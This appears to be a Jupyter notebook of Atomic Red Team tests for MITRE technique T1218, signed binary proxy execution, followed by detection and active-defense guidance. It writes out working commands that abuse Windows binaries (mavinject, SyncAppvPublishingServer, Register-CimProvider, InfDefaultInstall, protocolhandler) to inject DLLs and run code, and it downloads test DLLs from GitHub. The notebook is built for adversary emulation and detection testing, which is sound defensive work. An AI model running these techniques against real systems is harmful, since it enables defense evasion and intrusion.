# T1218 - Signed Binary Proxy Execution
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.

## Atomic Tests

In [None]:
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force

### Atomic Test #1 - mavinject - Inject DLL into running process
Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1218\src\x64\T1218.dll) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1218\src\x64\T1218.dll) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "PathToAtomicsFolder\T1218\src\x64\T1218.dll"

```

In [None]:
Invoke-AtomicTest T1218 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
mavinject.exe 1000 /INJECTRUNNING PathToAtomicsFolder\T1218\src\x64\T1218.dll
```

In [None]:
Invoke-AtomicTest T1218 -TestNumbers 1

### Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code
Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
SyncAppvPublishingServer.exe "n; Start-Process calc.exe"
```

In [None]:
Invoke-AtomicTest T1218 -TestNumbers 2

### Atomic Test #3 - Register-CimProvider - Execute evil dll
Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll"

```

In [None]:
Invoke-AtomicTest T1218 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\Windows\SysWow64\Register-CimProvider.exe -Path PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
```

In [None]:
Invoke-AtomicTest T1218 -TestNumbers 3

### Atomic Test #4 - InfDefaultInstall.exe .inf Execution
Test execution of a .inf using InfDefaultInstall.exe

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: INF file must exist on disk at specified location (#{inf_to_execute})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf"

```

In [None]:
Invoke-AtomicTest T1218 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
InfDefaultInstall.exe PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf
```

In [None]:
Invoke-AtomicTest T1218 -TestNumbers 4

### Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File
Emulates attack via documents through protocol handler in Microsoft Office.  On successful execution you should see Microsoft Word launch a blank file.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided

##### Check Prereq Commands:
```powershell
if (Test-Path "C:\Program Files\Microsoft Office\Office16\protocolhandler.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
write-host "Install Microsoft Word or provide correct path."

```

In [None]:
Invoke-AtomicTest T1218 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\Program Files\Microsoft Office\Office16\protocolhandler.exe "ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx"
```

In [None]:
Invoke-AtomicTest T1218 -TestNumbers 5

## Detection
Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.

Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.

## Shield Active Defense
### Software Manipulation 
 Make changes to a system's software properties and functions to achieve a desired effect. 

 Software Manipulation allows a defender to alter or replace elements of the operating system, file system, or any other software installed and executed on a system.
#### Opportunity
There is an opportunity to block an adversary's intended action and force them to reveal additional TTPs.
#### Use Case
A defender can monitor operating system functions calls to look for adversary use and/or abuse.
#### Procedures
Hook the Win32 Sleep() function so that it always performs a Sleep(1) instead of the intended duration. This can increase the speed at which dynamic analysis can be performed when a normal malicious file sleeps for long periods before attempting additional capabilities.
Hook the Win32 NetUserChangePassword() and modify it such that the new password is different from the one provided. The data passed into the function is encrypted along with the modified new password, then logged so a defender can get alerted about the change as well as decrypt the new password for use.
Alter the output of an adversary's profiling commands to make newly-built systems look like the operating system was installed months earlier.
Alter the output of adversary recon commands to not show important assets, such as a file server containing sensitive data.